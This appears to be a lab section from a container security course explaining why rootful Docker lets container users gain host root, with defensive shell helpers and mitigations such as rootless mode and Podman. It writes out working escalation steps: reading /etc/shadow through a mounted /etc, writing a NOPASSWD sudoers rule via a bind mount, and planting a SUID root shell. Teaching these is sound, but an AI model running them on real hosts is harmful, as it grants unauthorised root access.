2.8. Container Runtime Security

Run the following commands on your VM as a regular (non-root) user and read the output carefully:

whoami
head -1 /etc/shadow

Now run this:

docker run -v /etc:/host alpine sh -c 'whoami;head -1 /host/shadow'

Why can you suddenly read a file that only root should be able to read? Aren't containers supposed to be restricted? The answer lies in Docker's architecture:

Docker Architecture

By default, the Docker daemon runs as root and user namespaces are not enabled, so root inside a container is also root on the host. Anyone who can start containers can therefore mount any host path into a container and read or modify it there as the container's root user.
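You can confirm the missing user namespace by looking at the container's UID map. The function below is a minimal sketch (the name uid_map_is_identity is hypothetical) that assumes Linux: it succeeds when a uid_map file contains only the identity line 0 0 4294967295, which is what "no remapping" looks like.

```shell
# Hypothetical helper: succeed if the given uid_map (default: the current
# process's) is the identity mapping, i.e. no user namespace remapping.
uid_map_is_identity() {
    map_file=${1:-/proc/self/uid_map}
    # The initial user namespace has exactly one line: "0 0 4294967295".
    awk 'NR == 1 && $1 == 0 && $2 == 0 && $3 == 4294967295 { ok = 1 }
         END { exit !(ok && NR == 1) }' "$map_file"
}
```

On a default installation, docker run --rm alpine cat /proc/self/uid_map should print that single identity line, meaning UID 0 in the container is UID 0 on the host.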

It gets worse. Look at the following session:

user2@localhost$ whoami
user2
user2@localhost$ sudo su
Sorry, user user2 may not run sudo on localhost.
user2@localhost$ docker run --rm -it -v /etc/sudoers.d:/host/etc/sudoers.d alpine sh
/ # echo 'user2 ALL=(ALL) NOPASSWD:ALL' > /host/etc/sudoers.d/user2
/ # exit
user2@localhost$ sudo su
root@localhost$ whoami
root
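The session works because user2 is allowed to talk to the Docker daemon, typically through membership in the docker group that owns /var/run/docker.sock. As a rough audit, the hypothetical helper below lists the supplementary members of that group from /etc/group. It assumes the group is literally named docker and does not catch users whose primary group is docker.

```shell
# Hypothetical helper: print the supplementary members of the "docker" group.
docker_group_members() {
    group_file=${1:-/etc/group}
    # /etc/group lines look like <name>:<password>:<GID>:<member1,member2,...>
    awk -F: '$1 == "docker" {
        n = split($4, members, ",")
        for (i = 1; i <= n; i++)
            if (members[i] != "") print members[i]
    }' "$group_file"
}
```

Every user it prints can reproduce the sudoers trick above.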

To ensure that a user running a container does not gain root access to your host, run both the container engine and the containerized process as non-root users. This puts multiple layers of security between the service (httpd, MySQL, etc.) and the privileged resources of the operating system.

Running the container engine as a non-root user is one layer of defense; running the process inside the container as a different non-root user adds another.
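To check from the host which UID a container's main process really runs as, you can read its status from /proc. This is a sketch assuming Linux and a rootful daemon (so the PID reported by docker inspect --format '{{.State.Pid}}' <container> is a host PID); proc_euid is a hypothetical helper name.

```shell
# Hypothetical helper: print the effective UID of a process as seen from /proc.
proc_euid() {
    # The "Uid:" line of /proc/<pid>/status holds the real, effective,
    # saved and filesystem UIDs; the effective one is the third field.
    awk '/^Uid:/ { print $3 }' "/proc/$1/status"
}
```

A result of 0 means the containerized process is host root, i.e. neither layer of defense is in place.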

Here is an excerpt from the Docker documentation: "Rootless mode executes the Docker daemon and containers inside a user namespace. This is very similar to userns-remap mode, except that with userns-remap mode, the daemon itself runs with root privileges, whereas in rootless mode, both the daemon and the container are running without root privileges." In other words, the container processes, including the shim, run on the host as the unprivileged user who started the daemon (for example UID 1000): root inside the container maps to that user, and the other users inside the container map to a range of subordinate UIDs (typically starting at 100000).
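The translation the kernel performs can be reproduced from a uid_map file, whose lines have the form <first UID inside> <first UID outside> <count>. The sketch below (map_uid is a hypothetical name) looks up the host UID for a container UID. The example map 0 1000 1 / 1 100000 65536 is an assumption standing in for a typical rootless setup; the real values depend on the user's UID and subordinate range.

```shell
# Hypothetical helper: translate a UID inside a user namespace to the host UID.
map_uid() {
    map_file=$1
    inner_uid=$2
    awk -v uid="$inner_uid" '
        BEGIN { uid += 0 }  # force a numeric comparison
        uid >= $1 && uid < $1 + $3 { print $2 + (uid - $1); found = 1; exit }
        END { if (!found) exit 1 }
    ' "$map_file"
}
```

With that rootless map, container UID 0 becomes host UID 1000 and container UID 33 becomes 100032. A userns-remap map such as 0 100000 65536 would instead turn container root into host UID 100000.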

Rootless mode comes with a set of limitations: not all storage drivers are supported, the host network cannot be used directly (even --net=host stays namespaced), not all capabilities can be granted to a container, and AppArmor is not supported.

Another option is to switch from Docker to Podman.

While Docker relies on a client-server model, Podman employs a daemonless architecture. With Podman’s approach, users manage containers directly, eliminating the need for a continuous daemon process in the background.

Compared to Docker, Podman has stronger default security settings: most notably, it can run without being privileged, and features such as rootless containers, user namespaces, and seccomp profiles are enabled by default. The image below compares the Docker and Podman architectures.
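Rootless containers, whether run by Podman or by rootless Docker, take the extra container UIDs from the user's subordinate range in /etc/subuid, whose lines look like <user>:<first subordinate UID>:<count>. A minimal sketch for looking up that range (subuid_range is a hypothetical name; it assumes the entry uses the user name rather than the numeric UID):

```shell
# Hypothetical helper: print "<first subordinate UID> <count>" for a user.
subuid_range() {
    user=$1
    file=${2:-/etc/subuid}
    awk -F: -v u="$user" '
        $1 == u { print $2, $3; found = 1; exit }
        END { if (!found) exit 1 }
    ' "$file"
}
```

If it fails for a user, that user has no subordinate range, and rootless containers that need more than one UID will not work for them.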

Podman Architecture, src: https://dev.to/arafetki

SUID Privilege Escalation via Shared User Namespace Example

If your container runs as root, has a host directory mounted, and user namespaces are not enabled, you can use this to create a SUID root binary on the host:

mkdir -p /tmp/mydata
docker run -it \
  --name tmp_bind_test \
  --mount type=bind,source=/tmp/mydata,target=/container/temp \
  ubuntu /bin/bash

Now inside the container you can do the following:

cp /usr/bin/sh /container/temp/
chown 0:0 /container/temp/sh
chmod 4755 /container/temp/sh

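You have successfully placed a SUID root shell at /tmp/mydata/sh on the host, which any local user can execute. Because shells such as dash and bash drop elevated privileges on startup, run it as /tmp/mydata/sh -p to keep the effective UID 0.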
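From the defender's side, binaries planted this way are easy to spot with find. A minimal sketch (find_suid is a hypothetical name) that lists setuid files below a host directory, for example the bind-mounted /tmp/mydata:

```shell
# Hypothetical helper: list regular files with the setuid bit below a directory.
find_suid() {
    # -perm -4000: setuid bit set; -xdev: do not descend into other filesystems.
    find "$1" -xdev -type f -perm -4000 -print
}
```

Adding -user 0 to the find expression restricts the output to root-owned SUID files, which are the dangerous ones in this scenario.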

Recap

We saw how to run containers and how to secure them by avoiding root, dropping capabilities, mounting filesystems read-only, and using Linux security features such as seccomp. However, because of Docker's architecture, anyone who can start a container on a default (rootful) installation can effectively gain root privileges on the host. It therefore remains important to secure the host operating system and to consider a daemonless container technology such as Podman. We did not cover network security and monitoring; more on that in the Kubernetes Security lab.